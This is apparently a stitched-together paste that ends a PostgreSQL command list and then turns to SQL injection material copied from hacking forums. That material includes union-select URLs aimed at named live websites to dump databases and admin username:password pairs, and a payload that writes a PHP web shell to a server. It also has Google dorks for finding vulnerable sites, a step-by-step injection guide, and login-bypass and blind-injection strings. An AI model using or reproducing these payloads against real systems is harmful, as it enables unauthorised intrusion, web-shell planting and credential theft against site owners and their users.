841DROP TRIGGER -- remove a trigger
842DROP TYPE -- remove a user-defined data type
843DROP USER -- remove a database user account
844DROP VIEW -- remove a view
845END -- commit the current transaction
846EXECUTE -- execute a prepared query
847EXPLAIN -- show the execution plan of a statement
848FETCH -- retrieve rows from a table using a cursor
849GRANT -- define access privileges
850INSERT -- create new rows in a table
851LISTEN -- listen for a notification
852LOAD -- load or reload a shared library file
853LOCK -- explicitly lock a table
854MOVE -- position a cursor on a specified row of a table
855NOTIFY -- generate a notification
856PREPARE -- create a prepared query
857REINDEX -- rebuild corrupted indexes
858RESET -- restore the value of a run-time parameter to a default value
859REVOKE -- remove access privileges
860ROLLBACK -- abort the current transaction
861SELECT -- retrieve rows from a table or view
862SELECT INTO -- create a new table from the results of a query
863SET -- change a run-time parameter
864SET CONSTRAINTS -- set the constraint mode of the current transaction
865SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
866SET TRANSACTION -- set the characteristics of the current transaction
867SHOW -- show the value of a run-time parameter
868START TRANSACTION -- start a transaction block
869TRUNCATE -- empty a table
870UNLISTEN -- stop listening for a notification
871UPDATE -- update rows of a table
872VACUUM -- garbage-collect and optionally analyze a database
873
874
875
876
877http://www.wallistile.com/featured.php?id=-548 union select 1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12,1 ?3,14,15,16,17,18,19,20--
878
879
880.php?id=-1+union+select+1,2,3,4,5,'<?php @system($_REQUEST["cmd"]); ?>',6,7,8+INTO+DUMPFILE+'/home/username/public_html/images/shell.php'
881
882http://www.pixheaven.net/galerie_us.php?id=-3 union select 1,1,1,1,1,1,substring(@@version,1,1)=5,1,1-- f
883
884********************************************
885inurl:"php?id=" & intitle:"fucked"
886article_full.php?id=
887media.php?id=14358
888exp.php?ID=659
889view_video.php?id=19844
890
891Example of typical dork: inurl:"product.php?product_id="
892Example of a dork I would use: inurl:"view/products.php?ProdID=" & ".co.uk" & intext:"basket"
893
894inurl:"option=com_mytube"
895
896***************************
897
898union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x(hex value of "admin" here)--
899
900This will display the columns contained in table "admin".
901
902EDIT: sorry hac already answered ^_^. @op yes that is correct.
903
904
905try this
906
907Code:
908http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=0x703235336a376d6c5f6e687061--
909
910703235336a376d6c5f6e687061 = p253j7ml_nhpa in hex. p253j7ml_nhpa is a database in the site. I used this to get the database names.
911
912Code:
913http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(schema_name),3,4 from information_schema.schemata--
914
915
916Using database() gives you the "active" table, where as with using the query above you can see all the databases on the site, and specify which one you want to get the tables from.
917
918next, you'd get the columns like so
919
920Code:
921http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e--
922
92361646d696e = admin in hex.
924
925then finally, we get the username and password info, so we do
926
927Code:
928http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(username,0x3a,password),3,4 from admin--
929
9303a is a colon in hex. So its like username:password but you have to tell it in hex and you always need a 0x before any hex.
931
932NOTE: If you're getting tables from a different database thats not the active one (turns out this is the active database) you need to put the database in that query above too like this
933
934Code:
935http://www.lifeskillstraining.com/faq.php?id=null union select 1,group_concat(username,0x3a,password),3,4 from p253j7ml_nhpa.admin--
936
937(btw null is the same as -4 the - just nulls the number is it can be id=0, or id=null, or id=-99 they are all null)
938
939
940
941**************************************************
942
943http://www.lifeskillstraining.com:2082
944
945
946*****************************************************************
947
948
949So once you have you'r site
950http://www.xxxx.com/index.php?catid=1
951now we add a ' to the end of the url
952so the site is
953http://www.xxxx.com/index.php?catid=1'
954if there is an error of some sort then it is vulnerable
955now we need to find the number of columns in the sql database
956so we type
957http://www.xxxx.com/index.php?catid=1 order by 1-- "no error"
958http://www.xxxx.com/index.php?catid=1 order by 2-- "no error"
959http://www.xxxx.com/index.php?catid=1 order by 3-- "no error"
960http://www.xxxx.com/index.php?catid=1 order by 4-- "no error"
961http://www.xxxx.com/index.php?catid=1 order by 5-- "error"
962
963so this database has 4 columns because we got an error on 5
964on some databases there is 2 columns and on some 200 it varies
965so once we have the column number.
966we try the union function
967http://www.xxxx.com/index.php?catid=1 union select 1,2,3,4-- "or whatever number of columns are in the database"
968if you see some numbers like 1 2 3 4 on the screen or the column names
969it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
970so now we need to info about the db
971so lets say the numbers 2 and 4 showed up on the screen
972so i will use my query on 2
973http://www.xxxx.com/index.php?catid=1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
974the db type and version will pop up on the screen
975if the db version is 4 or lower then to extract the password you will need these queries
976http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
977this should display the table containing the admin username and password
978but if not then you will have to guess the table
979so once you have your table "or not"
980then type
981http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintablename--
982where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
983then once u have the right table name you should get the administrator password
984then just do the same thing but type username instead of password
985sometimes the password is hashed and you need to crack it.
986then see if you can get the admin panel if you cant then try the admin panel finder script here http://www.darkc0de.com/c0de/perl/admin_1.2_.txt
987now if the database is version 5 or up
988type
989http://www.xxxx.com/index.php?catid=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
990and that will display a list of all the tables
991once you have your table name
992type the same thing as 4
993http://www.xxxx.com/index.php?catid=1 UNION SELECT 1,password,3,4 FROM admintable--
994then the same with username
995but now if it doesnt work far all those things
996just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
997just play around with those
998but sometimes we also need to use the version() or version@@
999so sometimes UNION SELECT version (),password,3,4 FROM admintable--
1000or UNION SELECT version @@,password,3,4 FROM admintable--
1001
1002
1003&************************************************
1004
1005TO get all DBs use :-
1006http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--
1007
1008then convert DB name u want to get into to hex and add 0x before the hex
1009
1010then use
1011
1012the current query
1013http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=replace me with hex--
1014
1015
1016
1017*****************************************
1018
1019
1020Try these steps:
1021
1022 * To gain access and find a user name.
1023 'OR''='
1024
1025 SELECT name from users WHERE name='' OR ''='' AND password='' OR ''=''
1026
1027 Enter the string as both user name and password in the frame on the right. This should get you logged in as a user (jake happens to be the first user in the table). This tells you that Jake is a user and it allows you to access his account - but it does not tell you his password.
1028 * Find out if Jake's password includes the letter "w". Enter xxx as user name and enter the following string as the password:
1029 Does jake's password have a w in it?
1030 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
1031Does jake's password start with w?
1032 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE 'w%') AND ''='
1033Does jake's password have an w followed by d?
1034 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%d%') AND ''='
1035Is the fourth letter of jake's password w?
1036 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '___w%') AND ''='
1037
1038
1039 ' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
1040
1041 Are there more than 10 rows in the password table?
1042 ' OR (SELECT COUNT(*) FROM users)>10 AND ''='
1043Is there a user with an r in his name?
1044 ' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
1045Is there a user (other than jake) with an a in his name?
1046 ' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='